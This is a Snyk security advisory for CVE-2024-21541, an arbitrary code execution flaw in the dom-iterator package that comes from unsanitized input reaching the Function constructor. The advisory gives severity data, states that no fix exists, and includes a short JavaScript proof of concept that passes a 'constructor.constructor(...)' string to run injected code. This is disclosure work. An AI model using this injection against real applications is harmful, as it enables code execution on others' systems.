Arbitrary Code Execution Affecting org.webjars.npm:dom-iterator package, versions [0,]


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.13% (48th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Arbitrary Code Execution vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGWEBJARSNPM-8383166
  • published17 Nov 2024
  • disclosed15 Jan 2024
  • creditNodeMedic-FINE

Introduced: 15 Jan 2024

CVE-2024-21541  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

There is no fixed version for org.webjars.npm:dom-iterator.

Overview

org.webjars.npm:dom-iterator is a feature-rich, well-tested Iterator for traversing DOM nodes.

Affected versions of this package are vulnerable to Arbitrary Code Execution due to use of the Function constructor without complete input sanitization. Function generates a new function body and thus care must be given to ensure that the inputs to Function are not attacker-controlled. The risks involved are similar to that of allowing attacker-controlled input to reach eval.

PoC

Executing this code will cause the code console.log("GLOBAL.CTF HIT") to be executed, leading to the output of the string 'GLOBAL.CTF HIT' to the console.

var PUT = require('dom-iterator');
global.CTF = function() { console.log("GLOBAL.CTF HIT") } // We want to prove we can execute this by using the package

var parser = require('mini-html-parser'); var html = '<h1></h1>'; // Any non-empty html should work var parser = parser(html); var node = parser.parse();

var it = PUT(node); var next; while (next = it.next("constructor.constructor('global.CTF()')()")) { }

CVSS Scores

version 4.0
version 3.1